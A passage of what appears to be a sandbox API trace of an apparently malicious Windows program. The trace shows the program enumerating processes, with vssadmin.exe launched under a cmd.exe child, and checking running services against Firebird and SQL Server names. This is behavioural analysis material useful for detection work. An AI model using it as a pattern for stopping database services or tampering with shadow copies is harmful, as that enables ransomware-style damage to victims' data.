| out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0044.027] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0044.027] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0044.027] lstrlenW (lpString="cottage.exe") returned 11 [0044.028] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0044.028] lstrlenW (lpString="pairs_spec.exe") returned 14 [0044.028] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0044.029] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0044.029] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0044.030] lstrlenW (lpString="observationshairy.exe") returned 21 [0044.030] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0044.030] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0044.030] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0044.032] lstrlenW (lpString="spectrum.exe") returned 12 [0044.032] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0044.032] lstrlenW (lpString="dies.exe") returned 8 [0044.032] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0044.033] lstrlenW (lpString="configured.exe") returned 14 [0044.033] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0044.034] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0044.034] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0044.035] lstrlenW (lpString="fast.exe") returned 8 [0044.035] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0044.035] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0044.035] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0044.036] lstrlenW (lpString="review.exe") returned 10 [0044.036] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0044.037] lstrlenW (lpString="historybinding.exe") returned 18 [0044.037] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0044.038] lstrlenW (lpString="pk task surge.exe") returned 17 [0044.038] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0044.038] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0044.038] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0044.039] lstrlenW (lpString="mobsync.exe") returned 11 [0044.039] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0044.040] lstrlenW (lpString="ivttvf.exe") returned 10 [0044.040] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0044.040] lstrlenW (lpString="cmd.exe") returned 7 [0044.041] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.041] lstrlenW (lpString="conhost.exe") returned 11 [0044.041] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0044.042] lstrlenW (lpString="vssadmin.exe") returned 12 [0044.042] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0044.043] lstrlenW (lpString="VSSVC.exe") returned 9 [0044.043] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.043] lstrlenW (lpString="svchost.exe") returned 11 [0044.043] Process32NextW (in: hSnapshot=0x168, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0044.044] CloseHandle (hObject=0x168) returned 1 [0044.044] Sleep (dwMilliseconds=0x1f4) [0044.753] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5effa8 [0044.753] EnumServicesStatusExW (in: hSCManager=0x5effa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0044.753] GetLastError () returned 0xea [0044.753] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3f34088 [0044.754] EnumServicesStatusExW (in: hSCManager=0x5effa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f34088, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f34088, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0044.754] CloseServiceHandle (hSCObject=0x5effa8) returned 1 [0044.754] lstrlenW (lpString="Appinfo") returned 7 [0044.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0044.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0044.754] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0044.754] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0044.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0044.754] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0044.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.755] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0044.755] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0044.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0044.755] lstrlenW (lpString="AudioSrv") returned 8 [0044.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0044.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0044.755] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0044.755] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0044.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0044.755] lstrlenW (lpString="BFE") returned 3 [0044.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0044.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0044.755] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0044.755] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0044.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0044.755] lstrlenW (lpString="CryptSvc") returned 8 [0044.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0044.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0044.755] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0044.755] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0044.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0044.755] lstrlenW (lpString="CscService") returned 10 [0044.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0044.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0044.755] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0044.755] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0044.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0044.755] lstrlenW (lpString="DcomLaunch") returned 10 [0044.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.755] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0044.755] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0044.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0044.755] lstrlenW (lpString="Dhcp") returned 4 [0044.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0044.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0044.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0044.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0044.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0044.756] lstrlenW (lpString="Dnscache") returned 8 [0044.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0044.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0044.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0044.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0044.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0044.756] lstrlenW (lpString="DPS") returned 3 [0044.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0044.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0044.756] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0044.756] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0044.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0044.756] lstrlenW (lpString="eventlog") returned 8 [0044.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0044.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0044.756] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0044.756] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0044.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0044.756] lstrlenW (lpString="EventSystem") returned 11 [0044.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0044.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0044.756] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0044.756] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0044.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0044.756] lstrlenW (lpString="gpsvc") returned 5 [0044.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0044.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0044.756] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0044.756] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0044.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0044.757] lstrlenW (lpString="iphlpsvc") returned 8 [0044.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.757] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0044.757] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0044.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0044.757] lstrlenW (lpString="LanmanServer") returned 12 [0044.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0044.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0044.757] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0044.757] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0044.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0044.757] lstrlenW (lpString="LanmanWorkstation") returned 17 [0044.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.757] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0044.757] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0044.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0044.757] lstrlenW (lpString="lmhosts") returned 7 [0044.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0044.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0044.757] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0044.757] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0044.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0044.757] lstrlenW (lpString="MMCSS") returned 5 [0044.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0044.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0044.757] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0044.757] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0044.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0044.757] lstrlenW (lpString="MpsSvc") returned 6 [0044.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0044.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0044.757] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0044.757] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0044.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0044.758] lstrlenW (lpString="Netman") returned 6 [0044.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0044.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0044.758] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0044.758] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0044.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0044.758] lstrlenW (lpString="netprofm") returned 8 [0044.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0044.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0044.758] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0044.758] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0044.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0044.758] lstrlenW (lpString="NlaSvc") returned 6 [0044.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0044.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0044.758] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0044.758] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0044.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0044.758] lstrlenW (lpString="nsi") returned 3 [0044.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0044.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0044.758] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0044.758] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0044.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0044.758] lstrlenW (lpString="PcaSvc") returned 6 [0044.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0044.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0044.758] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0044.758] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0044.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0044.758] lstrlenW (lpString="PlugPlay") returned 8 [0044.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0044.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0044.758] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0044.759] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0044.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0044.759] lstrlenW (lpString="Power") returned 5 [0044.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0044.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0044.759] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0044.759] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0044.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0044.759] lstrlenW (lpString="ProfSvc") returned 7 [0044.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0044.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0044.759] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0044.759] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0044.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0044.759] lstrlenW (lpString="RpcEptMapper") returned 12 [0044.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.759] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0044.759] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0044.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0044.759] lstrlenW (lpString="RpcSs") returned 5 [0044.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0044.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0044.759] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0044.759] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0044.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0044.759] lstrlenW (lpString="SamSs") returned 5 [0044.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0044.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0044.759] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0044.759] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0044.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0044.759] lstrlenW (lpString="Schedule") returned 8 [0044.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0044.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0044.760] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0044.760] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0044.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0044.760] lstrlenW (lpString="SENS") returned 4 [0044.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0044.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0044.760] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0044.760] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0044.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0044.760] lstrlenW (lpString="ShellHWDetection") returned 16 [0044.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.760] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0044.760] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0044.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0044.760] lstrlenW (lpString="Spooler") returned 7 [0044.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0044.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0044.760] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0044.760] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0044.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0044.760] lstrlenW (lpString="swprv") returned 5 [0044.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0044.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0044.760] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0044.760] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0044.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0044.760] lstrlenW (lpString="SysMain") returned 7 [0044.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0044.760] lstrcmpiW 